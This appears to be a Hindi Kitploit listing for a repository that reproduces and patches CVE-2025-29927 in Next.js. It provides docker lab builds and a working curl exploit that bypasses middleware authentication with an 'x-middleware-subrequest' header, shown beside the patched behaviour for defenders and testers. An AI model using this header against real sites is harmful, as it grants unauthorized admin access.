Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29927 — CVE-2025-29927 भेद्यता का पुनरुत्पादन और समाधान। | Kitploit
उपकरण/GitHubGitHub/bongni/cve-2025-29927
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbongni/cve-2025-29927

CVE-2025-29927

CVE-2025-29927 भेद्यता का पुनरुत्पादन और समाधान।

रिपॉजिटरी देखें
119 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927

CVE-2025-29927 भेद्यता का पुनरुत्पादन और सुधार।

root@kitploit:~
git clone [email protected]:Bongni/CVE-2025-29927.git
cd CVE-2025-29927

vulnerable/ में एप्लिकेशन का एक संस्करण है जो हमले के प्रति संवेदनशील है। fixed/ में एप्लिकेशन का एक संस्करण है जो न्यूनतम संस्करण में अपग्रेड किया गया है जो भेद्यता को ठीक करता है।

⚠️ महत्वपूर्ण: ये उदाहरण डिफेंडरों, शोधकर्ताओं और पैचिंग को मान्य करने वाली टीमों के लिए प्रदान किए गए हैं। इन छवियों को सार्वजनिक या उत्पादन नेटवर्क पर न चलाएं। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जहां आपके पास स्पष्ट लिखित अनुमति है।

संवेदनशील संस्करण (Vulnerable version)

CVE-2025-29927 भेद्यता का पुनरुत्पादन।

डोकर कंटेनर बनाएं और प्रारंभ करें

root@kitploit:~
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln

एक्सप्लॉइट चलाएं

यह कमांड चलाएं, जिसे लॉगिन पेज पर रीडायरेक्ट होना चाहिए

root@kitploit:~
curl -i http://localhost:3000/admin
root@kitploit:~
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

फिर यह कमांड चलाएं, जो एडमिन पेज तक पहुंचने में सक्षम होना चाहिए

root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
root@kitploit:~
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5

...

सुधारित संस्करण (Fixed version)

CVE-2025-29927 भेद्यता का सुधार।

डोकर कंटेनर बनाएं और प्रारंभ करें

root@kitploit:~
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed

एक्सप्लॉइट चलाएं

यह कमांड चलाएं, जिसे लॉगिन पेज पर रीडायरेक्ट होना चाहिए

root@kitploit:~
curl -i http://localhost:3000/admin
root@kitploit:~
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

फिर यह कमांड चलाएं, जिसे अब भी लॉगिन पेज पर रीडायरेक्ट होना चाहिए

root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
root@kitploit:~
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

संदर्भ (References)

यह रिपॉजिटरी l1uk/nextjs-middleware-exploit पर आधारित है, लेकिन Next.js के संस्करण 15.x के लिए अनुकूलित किया गया है।

टूल डाउनलोड करें